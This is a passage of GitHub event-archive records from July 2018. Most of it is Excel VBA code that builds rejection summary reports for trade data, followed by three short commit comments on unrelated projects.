xlPinYin\r\n        .Sort.Apply\r\n    \r\n        For lRows = 2 To lLastRow\r\n            If .Cells(lRows, Application.Match(\"COB\", .Rows(1), 0)) = currCob Then\r\n                Set objSummary = New clsUncapitalisedSummary\r\n                objSummary.SourceSystem = \"VEN\"\r\n                objSummary.RejectionReason = getRejectionReason(.Cells(lRows, Application.Match(\"RejectionReason\", .Rows(1), 0)))\r\n                objSummary.BriefDescription = .Cells(lRows, Application.Match(\"Brief Description\", .Rows(1), 0)).Value\r\n                objSummary.BookId = .Cells(lRows, Application.Match(\"Book Id\", .Rows(1), 0)).Value\r\n                objSummary.CountOfId = 1\r\n                objSummary.SumOfNotional = .Cells(lRows, Application.Match(\"Notional\", .Rows(1), 0)).Value\r\n                objSummary.SumOfDDZR = .Cells(lRows, Application.Match(\"DDZR\", .Rows(1), 0)).Value\r\n                objSummary.SumOfAbsoluteDDZR = .Cells(lRows, Application.Match(\"Absolute DDZR\", .Rows(1), 0)).Value\r\n                objSummary.SumOfCR01 = .Cells(lRows, Application.Match(\"CR01\", .Rows(1), 0)).Value\r\n                objSummary.SumOfAbsoluteCR01 = .Cells(lRows, Application.Match(\"Absolute CR01\", .Rows(1), 0)).Value\r\n                key = objSummary.SourceSystem & objSummary.RejectionReason & objSummary.BriefDescription & objSummary.BookId\r\n                \r\n                If dictSummary.Exists(key) Then\r\n                    Set objSummary1 = dictSummary(key)\r\n                    objSummary1.CountOfId = objSummary1.CountOfId + objSummary.CountOfId\r\n                    objSummary1.SumOfNotional = objSummary1.SumOfNotional + objSummary.SumOfNotional\r\n                    objSummary1.SumOfDDZR = objSummary1.SumOfDDZR + objSummary.SumOfDDZR\r\n                    objSummary1.SumOfAbsoluteDDZR = objSummary1.SumOfAbsoluteDDZR + objSummary.SumOfAbsoluteDDZR\r\n                    objSummary1.SumOfCR01 = objSummary1.SumOfCR01 + objSummary.SumOfCR01\r\n                    objSummary1.SumOfAbsoluteCR01 = objSummary1.SumOfAbsoluteCR01 + objSummary.SumOfAbsoluteCR01\r\n                    Set dictSummary(key) = objSummary1\r\n                Else\r\n                    dictSummary.Add key, objSummary\r\n                End If\r\n            End If\r\n        Next lRows\r\n        \r\n        .Sort.SortFields.Clear\r\n        .Sort.SortFields.Add key:=.Range(\"B2:B\" & lLastRow), SortOn:=xlSortOnValues, Order:=xlDescending, DataOption:=xlSortNormal\r\n        .Sort.SetRange .Range(\"a1\").CurrentRegion\r\n        .Sort.Header = xlYes\r\n        .Sort.MatchCase = False\r\n        .Sort.Orientation = xlTopToBottom\r\n        .Sort.SortMethod = xlPinYin\r\n        .Sort.Apply\r\n    End With\r\n    If dictSummary.Count > 0 Then\r\n        Call PopulateUncapitalisedHeaders(oWkshtSummary)\r\n        Call RenderUncapitalisedSummary(oWkshtSummary, dictSummary)\r\n    End If\r\n    \r\n    Exit Sub\r\n    \r\nerrhandler:\r\n    MsgBox Err.Number & \" - \" & Err.Description\r\n    Exit Sub\r\n    Resume\r\nEnd Sub\r\n\r\n\r\nPublic Sub PrepareCapitalisedSummary(oWkshtSummary As Worksheet, oWkshtData As Worksheet, currCob As Date)\r\n    Dim lRows As Long\r\n    Dim lLastRow As Long\r\n    Dim objSummary As clsCapitalisedSummary\r\n    Dim objSummary1 As clsCapitalisedSummary\r\n    Dim dictSummary As New Scripting.Dictionary\r\n    Dim key\r\n    \r\n    On Error GoTo errhandler\r\n    \r\n    With oWkshtData\r\n        lLastRow = .Cells(.Rows.Count, 1).End(xlUp).Row\r\n        .Sort.SortFields.Clear\r\n        .Sort.SortFields.Add key:=.Range(\"B2:B\" & lLastRow), SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal\r\n        .Sort.SortFields.Add key:=.Range(\"C2:C\" & lLastRow), SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal\r\n        .Sort.SetRange .Range(\"a1\").CurrentRegion\r\n        .Sort.Header = xlYes\r\n        .Sort.MatchCase = False\r\n        .Sort.Orientation = xlTopToBottom\r\n        .Sort.SortMethod = xlPinYin\r\n        .Sort.Apply\r\n    \r\n        For lRows = 2 To lLastRow\r\n            If .Cells(lRows, Application.Match(\"COB\", .Rows(1), 0)) = currCob And _\r\n                .Cells(lRows, Application.Match(\"Source System\", .Rows(1), 0)) <> \"CP-VEN\" Then\r\n                    Set objSummary = New clsCapitalisedSummary\r\n                    objSummary.SourceSystem = .Cells(lRows, Application.Match(\"Source System\", .Rows(1), 0)).Value\r\n                    objSummary.RejectionReason = getRejectionReason(.Cells(lRows, Application.Match(\"Reason of Rejection\", .Rows(1), 0)))\r\n                    objSummary.BriefDescription = .Cells(lRows, Application.Match(\"Brief Description\", .Rows(1), 0)).Value\r\n                    objSummary.CountOfId = 1\r\n                    objSummary.SumOfMateriality = .Cells(lRows, Application.Match(\"Materiality\", .Rows(1), 0)).Value\r\n                    key = objSummary.SourceSystem & objSummary.RejectionReason & objSummary.BriefDescription\r\n                    \r\n                    If dictSummary.Exists(key) Then\r\n                        Set objSummary1 = dictSummary(key)\r\n                        objSummary1.CountOfId = objSummary1.CountOfId + objSummary.CountOfId\r\n                        objSummary1.SumOfMateriality = objSummary1.SumOfMateriality + objSummary.SumOfMateriality\r\n                        Set dictSummary(key) = objSummary1\r\n                    Else\r\n                        dictSummary.Add key, objSummary\r\n                    End If\r\n            End If\r\n        Next lRows\r\n        \r\n        .Sort.SortFields.Clear\r\n        .Sort.SortFields.Add key:=.Range(\"B2:B\" & lLastRow), SortOn:=xlSortOnValues, Order:=xlDescending, DataOption:=xlSortNormal\r\n        .Sort.SetRange .Range(\"a1\").CurrentRegion\r\n        .Sort.Header = xlYes\r\n        .Sort.MatchCase = False\r\n        .Sort.Orientation = xlTopToBottom\r\n        .Sort.SortMethod = xlPinYin\r\n        .Sort.Apply\r\n    End With\r\n    \r\n    If dictSummary.Count > 0 Then\r\n        Call PopulateCapitalisedHeaders(oWkshtSummary)\r\n        Call RenderCapitalisedSummary(oWkshtSummary, dictSummary)\r\n    End If\r\n    \r\n    Exit Sub\r\n    \r\nerrhandler:\r\n    MsgBox Err.Number & \" - \" & Err.Description\r\n    Exit Sub\r\n    Resume\r\nEnd Sub\r\n\r\n\r\nPublic Sub PopulateCapitalisedHeaders(oWksht)\r\n    Dim lRow As Long\r\n    \r\n    lRow = oWksht.Cells(oWksht.Rows.Count, 1).End(xlUp).Row + 2\r\n    With oWksht\r\n        .Cells(lRow, 1).Value = \"Capitalised Rejections\"\r\n        .Cells(lRow, 1).Font.Bold = True\r\n        .Cells(lRow, 1).Font.Size = 10\r\n        \r\n        lRow = lRow + 1\r\n        .Cells(lRow, 1).Value = \"Source System\"\r\n        .Cells(lRow, 2).Value = \"Rejection Detail\"\r\n        .Cells(lRow, 3).Value = \"Brief Description\"\r\n        .Cells(lRow, 4).Value = \"Count of Id\"\r\n        .Cells(lRow, 5).Value = \"Sum of Materiality\"\r\n        .Rows(lRow).Font.Bold = True\r\n        .Range(oWksht.Cells(lRow, 1), .Cells(lRow, 1).End(xlToRight)).Interior.Color = 14277081\r\n        .Range(oWksht.Cells(lRow, 1), .Cells(lRow, 1).End(xlToRight)).BorderAround , xlThin, , 10921638\r\n        .Range(oWksht.Cells(lRow, 1), .Cells(lRow, 1).End(xlToRight)).Borders(xlInsideVertical).Weight = xlThin\r\n        .Range(oWksht.Cells(lRow, 1), .Cells(lRow, 1).End(xlToRight)).Borders(xlInsideVertical).Color = 10921638\r\n    End With\r\nEnd Sub\r\n\r\nPublic Sub PopulateUncapitalisedHeaders(oWksht)\r\n    Dim lRow As Long\r\n\r\n    lRow = 4\r\n    With oWksht\r\n        .Cells(lRow, 1).Value = \"Uncapitalised Rejections\"\r\n        .Cells(lRow, 1).Font.Bold = True\r\n        .Cells(lRow, 1).Font.Size = 10\r\n        \r\n        lRow = lRow + 1\r\n        .Cells(lRow, 1).Value = \"Source System\"\r\n        .Cells(lRow, 2).Value = \"Rejection Detail\"\r\n        .Cells(lRow, 3).Value = \"Brief Description\"\r\n        .Cells(lRow, 4).Value = \"Book Id\"\r\n        .Cells(lRow, 5).Value = \"Count of Id\"\r\n        .Cells(lRow, 6).Value = \"Sum of Notional\"\r\n        .Cells(lRow, 7).Value = \"Sum of DDZR\"\r\n        .Cells(lRow, 8).Value = \"Sum of Absolute DDZR\"\r\n        .Cells(lRow, 9).Value = \"Sum of CR01\"\r\n        .Cells(lRow, 10).Value = \"Sum of Absolute CR01\"\r\n        .Rows(lRow).Font.Bold = True\r\n        .Range(oWksht.Cells(lRow, 1), .Cells(lRow, 1).End(xlToRight)).Interior.Color = 14277081\r\n        .Range(oWksht.Cells(lRow, 1), .Cells(lRow, 1).End(xlToRight)).BorderAround , xlThin, , 10921638\r\n        .Range(oWksht.Cells(lRow, 1), .Cells(lRow, 1).End(xlToRight)).Borders(xlInsideVertical).Weight = xlThin\r\n        .Range(oWksht.Cells(lRow, 1), .Cells(lRow, 1).End(xlToRight)).Borders(xlInsideVertical).Color = 10921638\r\n    End With\r\nEnd Sub\r\n\r\nPublic Function RenderUncapitalisedSummary(oWksht As Worksheet, dictSummary)\r\n    Dim lRows As Long\r\n    Dim oSummary As clsUncapitalisedSummary\r\n    Dim lHeaderRow As Long\r\n    Dim HeaderRows() As String\r\n    Dim key\r\n    Dim iHR As Long\r\n    Dim sFormula As String\r\n    \r\n    lRows = 6\r\n    With oWksht\r\n        For Each key In dictSummary\r\n            Set oSummary = dictSummary(key)\r\n            If lRows > 6 Then\r\n                If oWksht.Cells(lHeaderRow, 2).Value = oSummary.RejectionReason Then\r\n                    oWksht.Cells(lRows, 2).Value = \"\"\r\n                Else\r\n                    iHR = iHR + 1\r\n                    ReDim Preserve HeaderRows(1 To iHR)\r\n                    HeaderRows(iHR) = lRows\r\n                    .Cells(lRows, 2).Value = oWksht.Cells(lHeaderRow, 2).Value & \" Total\"\r\n                    .Cells(lRows, 5).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n                    .Cells(lRows, 6).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n                    .Cells(lRows, 7).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n                    .Cells(lRows, 8).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n                    .Cells(lRows, 9).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n                    .Cells(lRows, 10).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n                    .Range(.Cells(lRows, 2), .Cells(lRows, 10)).Interior.Color = 14610923\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, 10)).Borders(xlEdgeTop).Color = 10921638\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, 10)).Borders(xlEdgeRight).Color = 10921638\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, 10)).Borders(xlEdgeLeft).Color = 10921638\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, 10)).Borders(xlEdgeBottom).Color = 10921638\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, 10)).Borders(xlInsideVertical).Weight = xlThin\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, 10)).Borders(xlInsideVertical).Color = 10921638\r\n                    .Range(.Cells(lRows, 2), .Cells(lRows, 10)).Borders(xlInsideVertical).Weight = xlThin\r\n                    .Range(.Cells(lRows, 2), .Cells(lRows, 10)).Font.Bold = True\r\n                    lRows = lRows + 1\r\n                    .Cells(lRows, 2).Value = oSummary.RejectionReason\r\n                    lHeaderRow = lRows\r\n                End If\r\n                .Cells(lRows, 3).Value = oSummary.BriefDescription\r\n                .Cells(lRows, 4).Value = oSummary.BookId\r\n                .Cells(lRows, 5).Value = oSummary.CountOfId\r\n                .Cells(lRows, 6).Value = oSummary.SumOfNotional\r\n                .Cells(lRows, 7).Value = oSummary.SumOfDDZR\r\n                .Cells(lRows, 8).Value = oSummary.SumOfAbsoluteDDZR\r\n                .Cells(lRows, 9).Value = oSummary.SumOfCR01\r\n                .Cells(lRows, 10).Value = oSummary.SumOfAbsoluteCR01\r\n            Else\r\n                lHeaderRow = 6\r\n                .Cells(lRows, 1).Value = oSummary.SourceSystem\r\n                .Cells(lRows, 2).Value = oSummary.RejectionReason\r\n                .Cells(lRows, 3).Value = oSummary.BriefDescription\r\n                .Cells(lRows, 4).Value = oSummary.BookId\r\n                .Cells(lRows, 5).Value = oSummary.CountOfId\r\n                .Cells(lRows, 6).Value = oSummary.SumOfNotional\r\n                .Cells(lRows, 7).Value = oSummary.SumOfDDZR\r\n                .Cells(lRows, 8).Value = oSummary.SumOfAbsoluteDDZR\r\n                .Cells(lRows, 9).Value = oSummary.SumOfCR01\r\n                .Cells(lRows, 10).Value = oSummary.SumOfAbsoluteCR01\r\n            End If\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, 10)).Interior.Color = 15921906\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, 10)).Borders(xlEdgeTop).Color = 10921638\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, 10)).Borders(xlEdgeRight).Color = 10921638\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, 10)).Borders(xlEdgeLeft).Color = 10921638\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, 10)).Borders(xlEdgeBottom).Color = 10921638\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, 10)).Borders(xlInsideVertical).Weight = xlThin\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, 10)).Borders(xlInsideVertical).Color = 10921638\r\n            lRows = lRows + 1\r\n        Next key\r\n    End With\r\n    iHR = iHR + 1\r\n    ReDim Preserve HeaderRows(1 To iHR)\r\n    HeaderRows(iHR) = lRows\r\n    oWksht.Cells(lRows, 2).Value = oWksht.Cells(lHeaderRow, 2).Value & \" Total\"\r\n    oWksht.Cells(lRows, 5).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n    oWksht.Cells(lRows, 6).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n    oWksht.Cells(lRows, 7).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n    oWksht.Cells(lRows, 8).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n    oWksht.Cells(lRows, 9).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n    oWksht.Cells(lRows, 10).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n    oWksht.Range(oWksht.Cells(lRows, 2), oWksht.Cells(lRows, 10)).Interior.Color = 14610923\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Borders(xlEdgeTop).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Borders(xlEdgeRight).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Borders(xlEdgeLeft).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Borders(xlEdgeBottom).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Borders(xlInsideVertical).Weight = xlThin\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Borders(xlInsideVertical).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Font.Bold = True\r\n    lRows = lRows + 1\r\n    oWksht.Cells(lRows, 1).Value = \"Grand Total\"\r\n    '1\r\n    sFormula = \"=\"\r\n    For iHR = 1 To UBound(HeaderRows)\r\n        sFormula = sFormula & \"+e\" & HeaderRows(iHR)\r\n    Next iHR\r\n    oWksht.Cells(lRows, 5).Formula = sFormula\r\n    \r\n    sFormula = \"=\"\r\n    For iHR = 1 To UBound(HeaderRows)\r\n        sFormula = sFormula & \"+f\" & HeaderRows(iHR)\r\n    Next iHR\r\n    oWksht.Cells(lRows, 6).Formula = sFormula\r\n    \r\n    sFormula = \"=\"\r\n    For iHR = 1 To UBound(HeaderRows)\r\n        sFormula = sFormula & \"+g\" & HeaderRows(iHR)\r\n    Next iHR\r\n    oWksht.Cells(lRows, 7).Formula = sFormula\r\n    \r\n    sFormula = \"=\"\r\n    For iHR = 1 To UBound(HeaderRows)\r\n        sFormula = sFormula & \"+h\" & HeaderRows(iHR)\r\n    Next iHR\r\n    oWksht.Cells(lRows, 8).Formula = sFormula\r\n    \r\n    sFormula = \"=\"\r\n    For iHR = 1 To UBound(HeaderRows)\r\n        sFormula = sFormula & \"+i\" & HeaderRows(iHR)\r\n    Next iHR\r\n    oWksht.Cells(lRows, 9).Formula = sFormula\r\n    \r\n    sFormula = \"=\"\r\n    For iHR = 1 To UBound(HeaderRows)\r\n        sFormula = sFormula & \"+j\" & HeaderRows(iHR)\r\n    Next iHR\r\n    oWksht.Cells(lRows, 10).Formula = sFormula\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Interior.Color = 12379352\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Borders(xlEdgeTop).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Borders(xlEdgeRight).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Borders(xlEdgeLeft).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Borders(xlEdgeBottom).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Borders(xlInsideVertical).Weight = xlThin\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Borders(xlInsideVertical).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, 10)).Font.Bold = True\r\n    \r\n    \r\n    oWksht.Cells.EntireColumn.AutoFit\r\n    oWksht.Columns(1).ColumnWidth = 12\r\n    oWksht.Columns(2).ColumnWidth = 42\r\n    oWksht.Columns(\"E:F\").ColumnWidth = 15\r\n    oWksht.Columns(3).ColumnWidth = 60\r\n    oWksht.Rows.RowHeight = 22\r\n    oWksht.Range(\"B:C\").EntireColumn.WrapText = True\r\n    oWksht.Range(\"F:J\").NumberFormat = \"#,##0\"\r\n    \r\nEnd Function\r\n\r\nPublic Function RenderCapitalisedSummary(oWksht As Worksheet, dictSummary)\r\n    Dim lRows As Long\r\n    Dim oSummary As clsCapitalisedSummary\r\n    Dim lHeaderRow As Long\r\n    Dim HeaderRows() As String\r\n    Dim key\r\n    Dim iHR As Long\r\n    Dim sFormula As String\r\n    Dim lFirstRow As Long\r\n    Dim lColCount As Long\r\n    \r\n    lFirstRow = oWksht.Cells(oWksht.Rows.Count, 1).End(xlUp).Row + 1\r\n    lColCount = 5\r\n    lRows = lFirstRow\r\n    With oWksht\r\n        For Each key In dictSummary\r\n            Set oSummary = dictSummary(key)\r\n            If lRows > lFirstRow Then\r\n                If oWksht.Cells(lHeaderRow, 1).Value = oSummary.SourceSystem Then\r\n                    oWksht.Cells(lRows, 1).Value = \"\"\r\n                Else\r\n                    iHR = iHR + 1\r\n                    ReDim Preserve HeaderRows(1 To iHR)\r\n                    HeaderRows(iHR) = lRows\r\n                    .Cells(lRows, 1).Value = oWksht.Cells(lHeaderRow, 1).Value & \" Total\"\r\n                    .Cells(lRows, 4).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n                    .Cells(lRows, 5).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Interior.Color = 14610923\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Borders(xlEdgeTop).Color = 10921638\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Borders(xlEdgeRight).Color = 10921638\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Borders(xlEdgeLeft).Color = 10921638\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Borders(xlEdgeBottom).Color = 10921638\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Borders(xlInsideVertical).Weight = xlThin\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Borders(xlInsideVertical).Color = 10921638\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Borders(xlInsideVertical).Weight = xlThin\r\n                    .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Font.Bold = True\r\n                    lRows = lRows + 1\r\n                    .Cells(lRows, 1).Value = oSummary.SourceSystem\r\n                    lHeaderRow = lRows\r\n                End If\r\n                .Cells(lRows, 2).Value = oSummary.RejectionReason\r\n                .Cells(lRows, 3).Value = oSummary.BriefDescription\r\n                .Cells(lRows, 4).Value = oSummary.CountOfId\r\n                .Cells(lRows, 5).Value = oSummary.SumOfMateriality\r\n            Else\r\n                lHeaderRow = lFirstRow\r\n                .Cells(lRows, 1).Value = oSummary.SourceSystem\r\n                .Cells(lRows, 2).Value = oSummary.RejectionReason\r\n                .Cells(lRows, 3).Value = oSummary.BriefDescription\r\n                .Cells(lRows, 4).Value = oSummary.CountOfId\r\n                .Cells(lRows, 5).Value = oSummary.SumOfMateriality\r\n            End If\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Interior.Color = 15921906\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Borders(xlEdgeTop).Color = 10921638\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Borders(xlEdgeRight).Color = 10921638\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Borders(xlEdgeLeft).Color = 10921638\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Borders(xlEdgeBottom).Color = 10921638\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Borders(xlInsideVertical).Weight = xlThin\r\n            .Range(.Cells(lRows, 1), .Cells(lRows, lColCount)).Borders(xlInsideVertical).Color = 10921638\r\n            .Cells(lRows, 5).NumberFormat = \"#,##0\"\r\n            lRows = lRows + 1\r\n        Next key\r\n    End With\r\n    iHR = iHR + 1\r\n    ReDim Preserve HeaderRows(1 To iHR)\r\n    HeaderRows(iHR) = lRows\r\n    oWksht.Cells(lRows, 1).Value = oWksht.Cells(lHeaderRow, 1).Value & \" Total\"\r\n    oWksht.Cells(lRows, 4).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n    oWksht.Cells(lRows, 5).FormulaR1C1 = \"=SUM(R[\" & lHeaderRow - lRows & \"]C:R[-1]C)\"\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Interior.Color = 14610923\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Borders(xlEdgeTop).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Borders(xlEdgeRight).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Borders(xlEdgeLeft).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Borders(xlEdgeBottom).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Borders(xlInsideVertical).Weight = xlThin\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Borders(xlInsideVertical).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Font.Bold = True\r\n    oWksht.Cells(lRows, 5).NumberFormat = \"#,##0\"\r\n    lRows = lRows + 1\r\n    oWksht.Cells(lRows, 1).Value = \"Grand Total\"\r\n    \r\n    sFormula = \"=\"\r\n    For iHR = 1 To UBound(HeaderRows)\r\n        sFormula = sFormula & \"+D\" & HeaderRows(iHR)\r\n    Next iHR\r\n    oWksht.Cells(lRows, 4).Formula = sFormula\r\n    \r\n    sFormula = \"=\"\r\n    For iHR = 1 To UBound(HeaderRows)\r\n        sFormula = sFormula & \"+E\" & HeaderRows(iHR)\r\n    Next iHR\r\n    oWksht.Cells(lRows, 5).Formula = sFormula\r\n    \r\n    \r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Interior.Color = 12379352\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Borders(xlEdgeTop).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Borders(xlEdgeRight).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Borders(xlEdgeLeft).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Borders(xlEdgeBottom).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Borders(xlInsideVertical).Weight = xlThin\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Borders(xlInsideVertical).Color = 10921638\r\n    oWksht.Range(oWksht.Cells(lRows, 1), oWksht.Cells(lRows, lColCount)).Font.Bold = True\r\nEnd Function\r\n\r\nPublic Function getRejectionReason(sReason As String)\r\n    Dim vData\r\n    Dim strOut As String\r\n    Dim i As Long\r\n    Dim iStart As Long\r\n    Dim dictUnique As Scripting.Dictionary\r\n    Dim sFieldName As String\r\n    Dim sErrorDesc As String\r\n    \r\n    If sReason = \"\" Then Exit Function\r\n    \r\n    vData = Split(sReason, \"]\")\r\n    Set dictUnique = New Scripting.Dictionary\r\n    For i = 0 To UBound(vData) - 1\r\n        If i = 0 Then\r\n            sFieldName = Mid(vData(i), 2, InStr(vData(i), \"-\") - 2)\r\n        Else\r\n            sFieldName = Mid(vData(i), 3, InStr(vData(i), \"-\") - 2)\r\n        End If\r\n        sErrorDesc = Mid(vData(i), InStr(vData(i), \"-\") + 1)\r\n        If sFieldName Like \"stgValueChange*\" Then\r\n            sErrorDesc = \"Error in Reval Ladders\"\r\n            getRejectionReason = \"Error in Reval Ladders\"\r\n            Exit Function\r\n        End If\r\n        If Not dictUnique.Exists(sErrorDesc) Then\r\n            dictUnique.Add sErrorDesc, sErrorDesc\r\n        End If\r\n    Next i\r\n    \r\n    Call SortDictionary(dictUnique)\r\n    \r\n    strOut = \"\"\r\n    For i = 0 To dictUnique.Count - 1\r\n        strOut = strOut & dictUnique.Items(i) & vbCrLf\r\n    Next i\r\n    strOut = Left(strOut, Len(strOut) - 2)\r\n    \r\n    getRejectionReason = strOut\r\nEnd Function\r\n"}},"created_at":"2018-07-15T08:09:28Z"}
{"id":"7966996574","type":"CommitCommentEvent","actor":{"login":"neiloox"},"repo":{"name":"neiloox/neilooxtest"},"payload":{"comment":{"id":29711798,"position":null,"line":null,"path":null,"commit_id":"6036f53ad6f452ce860cccc9e656f54e8b6b1068","created_at":"2018-07-15T08:09:43Z","updated_at":"2018-07-15T08:09:43Z","author_association":"OWNER","body":"merge from develop"}},"created_at":"2018-07-15T08:09:43Z"}
{"id":"7966996600","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29711799,"position":36,"line":36,"path":"kafka-broker/build.gradle","commit_id":"81a0d7d92641688e63826841a22d9e9919943b21","created_at":"2018-07-15T08:09:45Z","updated_at":"2018-07-15T08:09:45Z","author_association":"OWNER","body":"In Gradle there are 2 phases for any build process, Configuration and Execution. All tasks are always been configured on every build, but only some of them are really executed as part of the Execution phase. The **<<** or **doLast** are used to run something at the Execution phase. The task of type Copy does not always execute the tarTree unarchive command. Hence configured copy into doLast section or can use << to the task definition as well to execute on every run."}},"created_at":"2018-07-15T08:09:45Z"}
{"id":"7966997832","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711800,"position":38,"line":38,"path":"src/lesson2/Task2.java","commit_id":"3a3677db1b03f8b1a457d9a3c3f442a7f3b932f4","created_at":"2018-07-15T08:10:58Z","updated_at":"2018-07-15T08:10:58Z","author_association":"NONE","body":"надо было проверить, помещаются ли оба дома на одном участке, а не каждый по отдельности. Иначе смысл вводить два дома, если можно было бы вводить параметры одного дома, но несколько раз"}},"created_at":"2018-07-15T08:10:58Z"}
